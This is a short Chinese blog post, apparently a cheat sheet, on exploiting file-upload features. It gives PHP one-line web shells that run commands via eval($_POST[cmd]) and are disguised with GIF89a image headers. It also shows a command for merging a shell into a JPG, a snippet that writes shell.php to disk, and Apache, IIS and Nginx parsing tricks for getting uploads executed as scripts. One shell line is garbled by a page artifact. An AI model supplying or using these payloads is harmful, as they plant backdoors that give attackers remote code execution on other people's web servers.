文件上传概要
变形的一句话木马
GIF89a
#define width 1337
#define height 1337
#只支持php5
<script language=”php”>@eval($_POST[cmd]);phpinfo();</script>
php7适用
GIF89a
#define width 1337
#define height 1337
<[email protected]($_POST[CMD]);
制作图片马的方法
准备一个一句话木马1.php和一个正常的图片2.jpg放到同一个文件夹
copy 1.jpg/b+1.php/a 2.jpg
写马 <?php fputs(fopen(‘shell.php’,’w’),'<?php @eval($_POST[cmd]);?>’)?>
解析漏洞
- Apache解析漏洞
apache1.x 2.x中,文件名的解析具有以下特性,Phpshell.php.rar 因为apache不认识.rar文件类型,所以会一直遍历后缀到.php ,认为这是一个php文件
- IIS解析漏洞
1.当文件名为abc.asp;xx.jpg时,IIS6会将文件解析为abc.asp;与0x00截断文件名类似,只是截断符变成了 “;”
2.IIS5.x/IIS6 目录解析:在网站下建立文件夹名称中带有.asp .asa等可执行脚本文件后缀作为后缀的文件夹,其目录内任何拓展名的文件都会被IIS当成可执行文件解析并执行
http://www.xx.com/1.aps/a.jpg
文件解析:IIS6.0以下,分号后面的不被解析,即是说1.asp;.jpg会被当成1.asp解析
- (Nginx漏洞)PHP CGI解析漏洞
IIS7.0/IIS7.5/Nginx<0.8.3
在fast-cgi开启状态下,xx.jpg会被当成php执行 http://www.xx.com/xx.jpg/.php
对于任意文件名,在后面加上 /任意文件名.php 后该文件就会以php格式进行解析。示例:tx.jpg/.php它将当做php进行解析。
原创文章,作者:ItWorker,如若转载,请注明出处:https://blog.ytso.com/279904.html